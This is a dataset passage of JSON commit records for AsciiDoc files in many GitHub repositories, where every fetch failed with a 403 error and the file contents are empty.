{"commit":"1a4732b3d5cb29a2f2152a9dcd8aa0abd19e4892","subject":"add README","message":"add README\n","repos":"binout\/wordpress-exit","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/wordpress-exit.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0430ca7d67a7a0e1f9c7423c15f7308a047e086e","subject":"Update 2015-07-27-test.adoc","message":"Update 2015-07-27-test.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-07-27-test.adoc","new_file":"_posts\/2015-07-27-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aeb063fd6130a861ccafab240b2961837de09eef","subject":"Update 2016-08-20-TEST.adoc","message":"Update 2016-08-20-TEST.adoc","repos":"bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io","old_file":"_posts\/2016-08-20-TEST.adoc","new_file":"_posts\/2016-08-20-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitcowboy\/bitcowboy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9acc9a4b562ce0027edfc5ec204b2d05547a32f2","subject":"Update 2019-08-22-okay.adoc","message":"Update 2019-08-22-okay.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-08-22-okay.adoc","new_file":"_posts\/2019-08-22-okay.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c213955f4c261f23dbcff93d5e27a652e4c0b3a1","subject":"Update 2017-06-28-Souls-of-the-Labyrinth-devblog-1.adoc","message":"Update 2017-06-28-Souls-of-the-Labyrinth-devblog-1.adoc","repos":"moonPress\/press.io,moonPress\/press.io,moonPress\/press.io,moonPress\/press.io","old_file":"_posts\/2017-06-28-Souls-of-the-Labyrinth-devblog-1.adoc","new_file":"_posts\/2017-06-28-Souls-of-the-Labyrinth-devblog-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moonPress\/press.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48dcdc65c1beb27ae914cf6788a60d6fb640e4a7","subject":"y2b create post Bose QC15 Unboxing - At the Airport!","message":"y2b create post Bose QC15 Unboxing - At the Airport!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-25-Bose-QC15-Unboxing--At-the-Airport.adoc","new_file":"_posts\/2014-06-25-Bose-QC15-Unboxing--At-the-Airport.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aab59be72f98b6b29c9015d813ce0a86608fbb49","subject":"Update 2015-10-27-north_india_trip_onedayhotel.adoc","message":"Update 2015-10-27-north_india_trip_onedayhotel.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-10-27-north_india_trip_onedayhotel.adoc","new_file":"_posts\/2015-10-27-north_india_trip_onedayhotel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87340d0128b3159f189eff260fff734527dbbfef","subject":"Update README.adoc with links to client tools","message":"Update README.adoc with links to client tools","repos":"hawkular\/hawkular-metrics,tsegismont\/hawkular-metrics,tsegismont\/hawkular-metrics,jotak\/hawkular-metrics,spadgett\/hawkular-metrics,ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,hawkular\/hawkular-metrics,jotak\/hawkular-metrics,mwringe\/hawkular-metrics,hawkular\/hawkular-metrics,ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,burmanm\/hawkular-metrics,tsegismont\/hawkular-metrics,burmanm\/hawkular-metrics,spadgett\/hawkular-metrics,burmanm\/hawkular-metrics,spadgett\/hawkular-metrics,ppalaga\/hawkular-metrics,spadgett\/hawkular-metrics,pilhuhn\/rhq-metrics,spadgett\/hawkular-metrics,burmanm\/hawkular-metrics,tsegismont\/hawkular-metrics,pilhuhn\/rhq-metrics,mwringe\/hawkular-metrics,mwringe\/hawkular-metrics,pilhuhn\/rhq-metrics,mwringe\/hawkular-metrics,pilhuhn\/rhq-metrics,hawkular\/hawkular-metrics,ppalaga\/hawkular-metrics","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"50ece2a54ad919b31e6d8078c413e760ce62a12b","subject":"Minor README updates based on review","message":"Minor README updates based on review\n","repos":"lihan\/ritzy,ritzyed\/ritzy,yakovenkodenis\/ritzy,gaurav-rygbee\/ritzy,shaunstanislaus\/ritzy,ritzyed\/ritzy,guiquanz\/ritzy,eiriklv\/ritzy,deepti2200\/ritzy,sangohan\/ritzy,sangohan\/ritzy,ritzyed\/ritzy,gaurav-rygbee\/ritzy,yakovenkodenis\/ritzy,guiquanz\/ritzy,eiriklv\/ritzy,deepti2200\/ritzy,sangohan\/ritzy,lihan\/ritzy,lihan\/ritzy,yakovenkodenis\/ritzy,deepti2200\/ritzy,gaurav-rygbee\/ritzy,shaunstanislaus\/ritzy,guiquanz\/ritzy,shaunstanislaus\/ritzy,eiriklv\/ritzy","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yakovenkodenis\/ritzy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22563d555b0c93a65814aec153f1eb7d556ffd2a","subject":"Update README","message":"Update README\n","repos":"pjanouch\/ponymap","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/ponymap.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"62199956503bc4467ff5bcf6225e8696acf75a3a","subject":"release 5.0.1.RELEASE","message":"release 5.0.1.RELEASE","repos":"terasoluna-batch\/v5-tutorial","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/terasoluna-batch\/v5-tutorial.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ffbbf9e04a07988839a8e55ade31dd6fd9d364b","subject":"Small typo in README","message":"Small typo in README\n\nThe path to make_site.sh is missing an \"s\" in \"scripts\".\n\nChange-Id: I7f2957296f1efa44fa26ce2351becb59d1679459\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2686\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Kudu Jenkins\n","repos":"InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fa559e0f3051c7884b4fb31b100d7c2b9107bf3f","subject":"Delete 2016-02-05-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","message":"Delete 2016-02-05-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-05-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","new_file":"_posts\/2016-02-05-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e11e801410d4eda0d4fa662f4194eddf499f7451","subject":"Update 2016-01-23-Learning-XQuery-Resources.adoc","message":"Update 2016-01-23-Learning-XQuery-Resources.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Learning-XQuery-Resources.adoc","new_file":"_posts\/2016-01-23-Learning-XQuery-Resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a5081ac73c3c8cef971c338d8731632933f6dce","subject":"Update 2017-12-03-Visual-studio-code-extension.adoc","message":"Update 2017-12-03-Visual-studio-code-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-03-Visual-studio-code-extension.adoc","new_file":"_posts\/2017-12-03-Visual-studio-code-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6531b12f8d37e3ac7fdd54b69419ec546edf1ab2","subject":"\u589e\u52a0 AbstractQueuedSynchronizer \u76f8\u5173\u7684\u53c2\u8003\u8d44\u6599","message":"\u589e\u52a0 AbstractQueuedSynchronizer \u76f8\u5173\u7684\u53c2\u8003\u8d44\u6599\n","repos":"diguage\/jdk-source-analysis,diguage\/jdk-source-analysis,diguage\/jdk-source-analysis","old_file":"AbstractQueuedSynchronizer.adoc","new_file":"AbstractQueuedSynchronizer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diguage\/jdk-source-analysis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a62b78a586d79f02a22989919db857536c8d7f6b","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb6f9e36add4dd6c8fb845354086413751b55b82","subject":"Update 2015-07-09-Hubot-Slack-VPS.adoc","message":"Update 2015-07-09-Hubot-Slack-VPS.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-07-09-Hubot-Slack-VPS.adoc","new_file":"_posts\/2015-07-09-Hubot-Slack-VPS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4aeb18c5dcda81c5b9f85148487f62055bcaa47","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"595007e05f4cecdf5da190eadf34608835f8252d","subject":"Pre-merge","message":"Pre-merge\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"509e821c1c6863b7949018197ca546e2008d8efa","subject":"y2b create post Turn Any Bottle Into A Speaker!","message":"y2b create post Turn Any Bottle Into A Speaker!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-29-Turn-Any-Bottle-Into-A-Speaker.adoc","new_file":"_posts\/2016-10-29-Turn-Any-Bottle-Into-A-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f63f64a7e11b9370b83a2e875caea71c375a76ff","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca0ac3873dc3a6dc33c0982137fddd6decc2bb92","subject":"Renamed '_posts\/2019-09-31-CSAW-CTF-2017-Qual-Serial-Misc50.adoc' to '_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc'","message":"Renamed '_posts\/2019-09-31-CSAW-CTF-2017-Qual-Serial-Misc50.adoc' to '_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11264d902bdc4d5ad705e0a4eb9088b1a67ab198","subject":"y2b create post Google Pixel 2 Event Live Stream","message":"y2b create post Google Pixel 2 Event Live Stream","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-04-Google-Pixel-2-Event-Live-Stream.adoc","new_file":"_posts\/2017-10-04-Google-Pixel-2-Event-Live-Stream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d8dd8d0f7d9d0af01f58335d2dbf3c83ab171b0","subject":"Update 2015-09-15-ASCiiDOC.adoc","message":"Update 2015-09-15-ASCiiDOC.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-15-ASCiiDOC.adoc","new_file":"_posts\/2015-09-15-ASCiiDOC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9998c664d561d5a78dbabce06f1af1dd80390b35","subject":"Update 2016-08-09-Test.adoc","message":"Update 2016-08-09-Test.adoc","repos":"ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog","old_file":"_posts\/2016-08-09-Test.adoc","new_file":"_posts\/2016-08-09-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciena-blueplanet\/developers.blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9286ba5e9bb39cd08888287ef2a25c8cdd28cdf2","subject":"range query for data repository","message":"range query for data repository\n","repos":"mygithubwork\/boot-works,mygithubwork\/boot-works,verydapeng\/boot-works,verydapeng\/boot-works","old_file":"data-rest.adoc","new_file":"data-rest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"442aa13eee3aadefdc8958b8ff7c9c74334c4010","subject":"Update 0000-00-00-Why-I-Have-No-Free-Time-Anymore.adoc","message":"Update 0000-00-00-Why-I-Have-No-Free-Time-Anymore.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/0000-00-00-Why-I-Have-No-Free-Time-Anymore.adoc","new_file":"_posts\/0000-00-00-Why-I-Have-No-Free-Time-Anymore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f947874ea6155b1beb742b68a1231bc21ca2d9c1","subject":"Update 2015-05-11-Os-sinais-de-uma-falsa-religiao.adoc","message":"Update 2015-05-11-Os-sinais-de-uma-falsa-religiao.adoc","repos":"murilo140891\/murilo140891.github.io,murilo140891\/murilo140891.github.io,murilo140891\/murilo140891.github.io,murilo140891\/murilo140891.github.io","old_file":"_posts\/2015-05-11-Os-sinais-de-uma-falsa-religiao.adoc","new_file":"_posts\/2015-05-11-Os-sinais-de-uma-falsa-religiao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/murilo140891\/murilo140891.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ce5c2f58c680ccd1bbc198130dde978fb6e2b8f","subject":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","message":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b9d3e9e03cd8790bb1af70abc2bdd464da06064","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7677a3661d429f3baecbd98fd506ea0fc46623f","subject":"ISIS-1819 Where-am-I feature initial adoc","message":"ISIS-1819 Where-am-I feature initial adoc","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/ugvw\/_ugvw_features_where-am-i.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/ugvw\/_ugvw_features_where-am-i.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4aba824b48c5ee6c5238a26627aed775866081c9","subject":"Update 2017-04-03-laravel-reminder.adoc","message":"Update 2017-04-03-laravel-reminder.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-03-laravel-reminder.adoc","new_file":"_posts\/2017-04-03-laravel-reminder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd9cd72b7ce8b9bbadee0992297202c017a21c77","subject":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","message":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8e7b044b1078f2bd575a5e1100ce2259ccf0efc","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20c652f0e6a39fbd613469301aec72a9e3fd29ca","subject":"Update 2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","message":"Update 2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","new_file":"_posts\/2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9b27c44a2fc0a090c2c25822fd7be52891dfbc8","subject":"2016-07-09-Tiger.adoc","message":"2016-07-09-Tiger.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-09-Tiger.adoc","new_file":"_posts\/2016-07-09-Tiger.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a75f71e7bbf92190dd396cb097c9257880c282aa","subject":"Update 2016-04-29-Static-Initialize-Order-Elvis.adoc","message":"Update 2016-04-29-Static-Initialize-Order-Elvis.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2016-04-29-Static-Initialize-Order-Elvis.adoc","new_file":"_posts\/2016-04-29-Static-Initialize-Order-Elvis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23514ede8f4e79e486294ba5855bcd99daf1b188","subject":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b376dace1a8fe6b7c11c0dd40d09102af1ccaed","subject":"Update 2017-10-16-Emacs-for-Visual-Studio-users.adoc","message":"Update 2017-10-16-Emacs-for-Visual-Studio-users.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-16-Emacs-for-Visual-Studio-users.adoc","new_file":"_posts\/2017-10-16-Emacs-for-Visual-Studio-users.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b5337d08ec2c5dda98e91d32c1471e7779291c1","subject":"v1.84","message":"v1.84\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_rpc_server_spec.asciidoc","new_file":"trex_rpc_server_spec.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b8edcaab1dd464efcb1d1367fe1ec77eb55f0cc1","subject":"Update 2015-05-25-Hallo.adoc","message":"Update 2015-05-25-Hallo.adoc","repos":"rpwolff\/rpwolff.github.io,rpwolff\/rpwolff.github.io,rpwolff\/rpwolff.github.io","old_file":"_posts\/2015-05-25-Hallo.adoc","new_file":"_posts\/2015-05-25-Hallo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rpwolff\/rpwolff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c709d2eac5fb5be94e3c6eca0e95070c19673a08","subject":"Update 2015-11-05-O-HAI.adoc","message":"Update 2015-11-05-O-HAI.adoc","repos":"silviu\/silviu.github.io,silviu\/silviu.github.io,silviu\/silviu.github.io","old_file":"_posts\/2015-11-05-O-HAI.adoc","new_file":"_posts\/2015-11-05-O-HAI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silviu\/silviu.github.io.git\/': The requested URL returned 